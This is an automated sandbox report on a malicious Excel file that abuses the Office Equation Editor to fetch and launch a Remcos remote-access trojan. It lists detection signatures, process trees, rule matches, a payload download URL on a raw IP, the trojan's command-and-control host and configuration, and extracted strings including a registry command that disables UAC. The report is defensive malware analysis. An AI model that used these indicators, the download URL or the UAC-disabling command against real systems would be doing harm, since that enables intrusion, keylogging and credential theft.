Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
202404294766578200.xlam.xlsx

Overview

General Information

Sample name:202404294766578200.xlam.xlsx
Analysis ID:1435094
MD5:9336f772a40e762cc855b7c9b75b1d28
SHA1:837d90dbe2f9c267e26ad4e170b7bd03d199f335
SHA256:ca377ebfd8e0d57754a3780b6b7360a76efad94c8d5753e172a52802bf109ddc
Tags:AgentTeslaxlamxlsx
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1216 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 800 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • YED.exe (PID: 652 cmdline: C:\Users\user\AppData\Roaming\YED.exe MD5: 9ABB13386C543EB5FEA7DEA95EB86D26)
        • Bactris.exe (PID: 3740 cmdline: C:\Users\user\AppData\Roaming\YED.exe MD5: A8004A594D5D55F5A5F5ABDBB8001FA9)
          • svchost.exe (PID: 3680 cmdline: C:\Users\user\AppData\Roaming\YED.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
            • svchost.exe (PID: 3752 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr" MD5: 54A47F6B5E09A77E61649109C6A08866)
            • svchost.exe (PID: 3712 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb" MD5: 54A47F6B5E09A77E61649109C6A08866)
            • svchost.exe (PID: 3672 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce" MD5: 54A47F6B5E09A77E61649109C6A08866)
  • chrome.exe (PID: 1564 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 2960 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1452,i,15568989383610033621,8608539169459799112,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • chrome.exe (PID: 2068 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 3672 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=892 --field-trial-handle=1396,i,13358231411772672971,2555512376125685792,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x24c3:$s1: <legacyDrawing r:id="
  • 0x24eb:$s2: <oleObject progId="
  • 0x2524:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6c4a8:$a1: Remcos restarted by watchdog!
      • 0x6ca20:$a3: %02i:%02i:%02i:%03i
      00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6656c:$str_b2: Executing file:
      • 0x675ec:$str_b3: GetDirectListeningPort
      • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x67118:$str_b7: \update.vbs
      • 0x66594:$str_b9: Downloaded file:
      • 0x66580:$str_b10: Downloading file:
      • 0x66624:$str_b12: Failed to upload file:
      • 0x675b4:$str_b13: StartForward
      • 0x675d4:$str_b14: StopForward
      • 0x67070:$str_b15: fso.DeleteFile "
      • 0x67004:$str_b16: On Error Resume Next
      • 0x670a0:$str_b17: fso.DeleteFolder "
      • 0x66614:$str_b18: Uploaded file:
      • 0x665d4:$str_b19: Unable to delete:
      • 0x67038:$str_b20: while fso.FileExists("
      • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
      00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6637c:$s1: CoGetObject
      • 0x66390:$s1: CoGetObject
      • 0x663ac:$s1: CoGetObject
      • 0x70338:$s1: CoGetObject
      • 0x6633c:$s2: Elevation:Administrator!new:
      Click to see the 13 entries
      SourceRuleDescriptionAuthorStrings
      17.2.svchost.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        17.2.svchost.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          17.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4a8:$a1: Remcos restarted by watchdog!
          • 0x6ca20:$a3: %02i:%02i:%02i:%03i
          17.2.svchost.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
          • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x6656c:$str_b2: Executing file:
          • 0x675ec:$str_b3: GetDirectListeningPort
          • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x67118:$str_b7: \update.vbs
          • 0x66594:$str_b9: Downloaded file:
          • 0x66580:$str_b10: Downloading file:
          • 0x66624:$str_b12: Failed to upload file:
          • 0x675b4:$str_b13: StartForward
          • 0x675d4:$str_b14: StopForward
          • 0x67070:$str_b15: fso.DeleteFile "
          • 0x67004:$str_b16: On Error Resume Next
          • 0x670a0:$str_b17: fso.DeleteFolder "
          • 0x66614:$str_b18: Uploaded file:
          • 0x665d4:$str_b19: Unable to delete:
          • 0x67038:$str_b20: while fso.FileExists("
          • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
          17.2.svchost.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x6637c:$s1: CoGetObject
          • 0x66390:$s1: CoGetObject
          • 0x663ac:$s1: CoGetObject
          • 0x70338:$s1: CoGetObject
          • 0x6633c:$s2: Elevation:Administrator!new:
          Click to see the 15 entries

          Exploits

          barindex
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.94.54.101, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 800, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 800, TargetFilename: C:\Users\user\AppData\Roaming\YED.exe

          System Summary

          barindex
          Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 800, Protocol: tcp, SourceIp: 23.94.54.101, SourceIsIpv6: false, SourcePort: 80
          Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Roaming\YED.exe, CommandLine: C:\Users\user\AppData\Roaming\YED.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\YED.exe, NewProcessName: C:\Users\user\AppData\Roaming\YED.exe, OriginalFileName: C:\Users\user\AppData\Roaming\YED.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ProcessId: 652, ProcessName: YED.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Roaming\YED.exe, CommandLine: C:\Users\user\AppData\Roaming\YED.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\YED.exe, NewProcessName: C:\Users\user\AppData\Roaming\YED.exe, OriginalFileName: C:\Users\user\AppData\Roaming\YED.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ProcessId: 652, ProcessName: YED.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\YED.exe, CommandLine: C:\Users\user\AppData\Roaming\YED.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ParentImage: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe, ParentProcessId: 3740, ParentProcessName: Bactris.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ProcessId: 3680, ProcessName: svchost.exe
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3680, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Roaming\YED.exe, CommandLine: C:\Users\user\AppData\Roaming\YED.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ParentImage: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe, ParentProcessId: 3740, ParentProcessName: Bactris.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ProcessId: 3680, ProcessName: svchost.exe

          Data Obfuscation

          barindex
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe, ProcessId: 3740, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbs

          Stealing of Sensitive Information

          barindex
          Source: Registry Key setAuthor: Joe Security: Data: Details: FD 44 4B 36 AE 9C E0 16 26 19 F5 A2 D6 C2 5C 1C 3F 2E 1E 22 74 EF 03 FE 4E CA 0A C8 28 C8 02 76 CE D4 34 45 AE BE CC E8 6F 0D CB 89 C3 D6 7F 35 0B 71 0A 11 71 35 61 80 1D 1C F9 6D 0A C2 5C 62 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3680, TargetObject: HKEY_CURRENT_USER\Software\Rmc-E70NOS\exepath
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 202404294766578200.xlam.xlsxAvira: detected
          Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
          Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
          Source: http://23.94.54.101/GVV.exeAvira URL Cloud: Label: malware
          Source: 16.2.Bactris.exe.2990000.1.raw.unpackMalware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Source: 202404294766578200.xlam.xlsxReversingLabs: Detection: 68%
          Source: 202404294766578200.xlam.xlsxVirustotal: Detection: 50%Perma Link
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\YED.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00433837
          Source: Bactris.exe, 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_64e20cd0-e

          Exploits

          barindex
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.94.54.101 Port: 80Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\YED.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\YED.exeJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

          Privilege Escalation

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004074FD _wcslen,CoGetObject,17_2_004074FD
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\GoogleJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_1564_1766989274Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: Bactris.exe, 00000010.00000003.762094067.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Bactris.exe, 00000010.00000003.761995898.0000000002B10000.00000004.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_0027DBBE
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0024C2A2 FindFirstFileExW,3_2_0024C2A2
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002868EE FindFirstFileW,FindClose,3_2_002868EE
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0028698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_0028698F
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0027D076
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0027D3A9
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00289642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00289642
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0028979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0028979D
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_010EDBBE
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010BC2A2 FindFirstFileExW,16_2_010BC2A2
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_010F698F
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F68EE FindFirstFileW,FindClose,16_2_010F68EE
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_010ED076
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_010ED3A9
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_010F979D
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_010F9642
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_010F9B2B
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F5C97 FindFirstFileW,FindNextFileW,FindClose,16_2_010F5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
